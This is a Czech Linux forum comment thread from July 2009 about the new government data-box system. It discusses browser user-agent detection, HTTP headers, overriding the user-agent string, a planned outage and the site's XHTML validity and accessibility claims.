Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Zrovna tento konkrétní popis vyžaduje stejnou síť. Ale obdobně to lze udělat i s přístupem ke kterémukoli routeru po cestě, další možnost je třeba podvrhnout DNS odpověď (to můžete teoreticky zvládnout u počítače na druhém konci světa)…
vlastikroot avatar 4.7.2009 13:17 vlastikroot | skóre: 25 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
LOL
Sg1-game | We will destroys the Christian's legion ... and the cross, will be inverted | IP 80.188.182.6
Jendа avatar 4.7.2009 13:37 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
A fakt se hlásí jako Firefox? V Debianu se třeba hlásí jako Iceweasel a v Archu Minefield (IMHO).
vlastikroot avatar 4.7.2009 13:47 vlastikroot | skóre: 25 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
JJ minefield , ale jde o to ze k cemu je tam pak takova detekce ?? To si snad nemuze nikdo normalni dovolit :-D
Sg1-game | We will destroys the Christian's legion ... and the cross, will be inverted | IP 80.188.182.6
4.7.2009 13:57 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Úplně klidně. Kdyby teda byli co k čemu, detekují slovo Gecko :-)

Když jsem jednou dočasně musel zobrazovat uživatelům prohlížečů postavených na Gecku upozornění na nefunkčnost WYSIWYG editace HTML, detekoval jsem "Gecko/1.8.blablabla" (už nevím, od které verze přesně to bylo), ale v upozornění jsem bez skrupulí použil slovo Firefox. Koho zajímá jakési Gecko a proč mluvit o jakési Mozille – technici vědí a u netechniků nějaká jiná Gecko-aplikace prakticky nehrozí.
Ještě na tom nejsem tak špatně, abych četl Viewegha.
thingie avatar 4.7.2009 13:59 thingie | skóre: 8
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Konqueror se pak třeba hlásí jako „like Gecko“, například. Tak co s tím. A přitom je dost odlišný. Ty identifikace prohlížečů jsou asi strašně nanic, nejlíp asi nepoužívat to vůbec, zdá se.
Růžové lži.
4.7.2009 14:04 12345 | skóre: 41 | blog:
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Prosím tě, kde žiješ? Copak nevíš, co o tom kážou odborníci na prohlížeče? :-D

One of the most common operations performed in a Web page is to detect the browser type and version.
4.7.2009 14:12 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Jenže ona to dost možná bude pravda, proč by jinak už od dřevních dob webu velká většina prohlížečů začínala svůj UA řetězec "Mozilla/4.0"? :-)
Ještě na tom nejsem tak špatně, abych četl Viewegha.
4.7.2009 14:09 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Jo, no, ale Gecko/X.Y.Z.W mají snad jenom opravdové Gecko-věci. UA řetězec by byla super věc, kdyby to prohlížeče dělaly pořádně (už i Opera musela slevit, s tou verzí 10…), ale i v dnešním stavu se nějaká, byť třeba hrubá, detekce dělat dá.

Druhá věc je, jak se s výsledkem takové detekce zachází. Zablokovat uživatele nerozpoznaného prohlížeče je zločin, za který by měl autor viset za koule v průtrži mračen a do očí by mu měli zapíchat špendlíky. Ale s posíláním upravených/opravených verzí pro konkrétní prohlížeče a nějakého defaultu pro všechny ostatní, pokud není zbytí, naprosto nemám problém. Ale to už jsme off topic.
Ještě na tom nejsem tak špatně, abych četl Viewegha.
thingie avatar 4.7.2009 14:39 thingie | skóre: 8
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
On může mít kdokoliv cokoliv, žejo. RFC 2616 se k tomu vyjadřuje jenom orientačně, a i kdyby, HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokol, tak je to úplně jedno. Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo. Neřeknu odlišný CSS styl, nebo nějaké drobnosti, ale úplně jiná odpověď, to je prostě katastrofa. Vyrábí se tím šílený zmatek, odpovědi se stanou nepředvídatelnými, a vůbec se to nedá označit za pozitivní jev.
Růžové lži.
4.7.2009 16:26 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokol
Opravdu HTTP? Nenapadá mne nic, co by se dnes masově při HTTP komunikaci používalo, a bylo to v rozporu se specifikací HTTP nebo v ní nebylo uvedeno.
Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo.
Specifikace protokolu HTTP na to má jiný názor a dokonce specifikuje hlavičku Vary, na základě které se určí, které hlavičky HTTP dotazu ovlivňují výběr odpovědi.
thingie avatar 4.7.2009 16:38 thingie | skóre: 8
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Zvykové právo má ovšem názor takový, že Vary se pro tohle stejně použít nedá, protože stejně neexistuje žádný dohodnutý způsob jak si takto sdělit, že jinému prohlížeči (jakému, jak) něco řeknu, co jemu ne. A prohlížeč s touhle informací nemá moc jak naložit, ani to vysvětlit uživateli. Konečně, co taky čekat od mechanismu, který je určen pro proxy a cache.
Růžové lži.
4.7.2009 18:27 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Odpověděl jste si sám. Ta hlavička je určená pro proxy a cache, prohlížeč ji nepotřebuje. Onen dohodnutý způsob, který podle vás neexistuje, je jazyk český (na českých webech), kterým se do HTML stránky (pokud jde o HTML stránku) napíše, že váš prohlížeč neumí to a to a pokud to potřebujete, můžete použít například prohlížeč X nebo Y. Pokud to však server detekuje špatně, není to problém protokolu ani prohlížeče, ale problém autora aplikace. Ale před neschopností autora vás samozřejmě žádný protokol neochrání.
David Watzke avatar 4.7.2009 16:43 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Jojo, tohle je chlípnost, prudí to na kdejakým webu. Řešením je jít do about:config a přidat si tam novou předvolbu (řetězec) general.useragent.override s hodnotou např.
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5
“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
vlastikroot avatar 4.7.2009 20:45 vlastikroot | skóre: 25 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Vim ze si muzu zmenit UA, ale neni to spis jen workaround ? Chci aby bylo videt co pouzivam, ze pouzivam treba Gran Paradiso (jedina vec podle ktere je poznat ze mam archa) nebo Konqueror, nez Firefox. Treba moootools ma detekci browseru, ale jen na zaklade funkci, ne user agentu. Takze muzu zjistit IE, a pritom to IE vubec byt nemusi, ale je stejne nefunkcni. Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.
Sg1-game | We will destroys the Christian's legion ... and the cross, will be inverted | IP 80.188.182.6
Grunt avatar 4.7.2009 21:00 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.
Samotná Mozilla na tom nebyla o moc lépe.
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
vlastikroot avatar 4.7.2009 23:34 vlastikroot | skóre: 25 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Technologicka dema jsou trochu neco jineho nez projekt za 900M :-D
Sg1-game | We will destroys the Christian's legion ... and the cross, will be inverted | IP 80.188.182.6
Grunt avatar 5.7.2009 10:37 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Krom toho že si někdo pravděpodobně koupí novou vilu a pár aut, v čem?
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
Salamek avatar 5.7.2009 12:16 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
no spíš pár vilek i s ostrůvkem a nějaky ty auta
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
vlastikroot avatar 5.7.2009 12:42 vlastikroot | skóre: 25 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
S tebou se neda diskutovat :-D vzdycky mas lepsi pravdu nez ja :-D
Sg1-game | We will destroys the Christian's legion ... and the cross, will be inverted | IP 80.188.182.6
stativ avatar 5.7.2009 09:14 stativ | skóre: 54 | blog: SlaNé roury
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Sakra, abych Shiretoko zaměnil za Firefox ;-)
Ať sežeru elfa i s chlupama!!! ljirkovsky.wordpress.com stativ.tk
Jendа avatar 4.7.2009 19:45 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Omluvte plánovanou odstávku informačního systému datových schránek od 4. 7. do 5. 7.
Muhehe, čtyři dny to jelo a už si naplánovali odstávku :-)
Jendа avatar 4.7.2009 19:47 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Omlouváme se všem uživatelům Datových schránek, v současné době probíhá plánovaná odstávka, z důvodů prací spojených s náběhem systému. Práce se týkají implementace změn v systému Datových schránek, které vyplývají z Novely zákona 300/2008 Sb. Probíhá rovněž plánované zátěžové testování systému a činnosti, které souvisí s další etapou bezpečnostního auditu systému Datových schránek.
Že by se ledy hnuly?
Grunt avatar 4.7.2009 20:34 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Takže jako žádná akční reportáž na TV Nova?
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
Jendа avatar 4.7.2009 20:36 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nevím, TV moc nesleduji s zprávy na Nově už vůbec ne... Nebylo tam něco?
Jendа avatar 6.7.2009 14:49 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nehnuly... DS jsou zpět online a pořád to tam je.
Salamek avatar 5.7.2009 02:51 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
S validitou se taky moc nesrali , sice to nejsou hrubky ale na tak drahej projekt by to mohli prasit alespon mín než já , když jde navíc o tak chudou stránku Invalidní
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
Salamek avatar 5.7.2009 02:55 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
stojí za to si přečíst : http://www.czebox.cz/static/pages/prohlaseni.html
hlavně část:
Při tvorbě stránek byl použit značkovací jazyk HTML podle specifikace XHTML 1.0 Strict a bylo dbáno na dodržení syntaktické i sémantické správnosti.(ano to vidíme )
a
Stránky Informačního systému datových schránek byly vytvořeny s maximální snahou vyhovět všem závazným předpisům podle zákona č. 365/2001 Sb., vyhlášky 64/2008 Sb. a související metodické příručky. Splňují tak důležité zásady přístupnosti podle metodiky Blind Friendly Web (BFW) i Web Content Accessibility Guidlines (WCAG).
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
xkucf03 avatar 5.7.2009 10:42 xkucf03 | skóre: 47 | blog: xkucf03
Rozbalit Rozbalit vše Snaha, luseři a BFU.

Jenže „maximální snaha“ neříká nic o tom, zda se výsledku podařilo dosáhnout – píše-li to luser, ani maximální snažení nebude korunováno XHTML validitou :-)

Ad BFW – existuje i něco jako BFU Friendly Web? :-D

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-Výuka.cz, Nekuřák.net
Jendа avatar 5.7.2009 12:28 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Neřekl bych, že je to nějak extrémně přístupné (kvůli závislosti na Filleru) ;-).
Salamek avatar 5.7.2009 13:20 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
oni tma nic o 602 nemelou v tom prohlášení melou tma jen o PDF ,Widle formatu Office a ODF
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

Založit nové vláknoNahoru

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.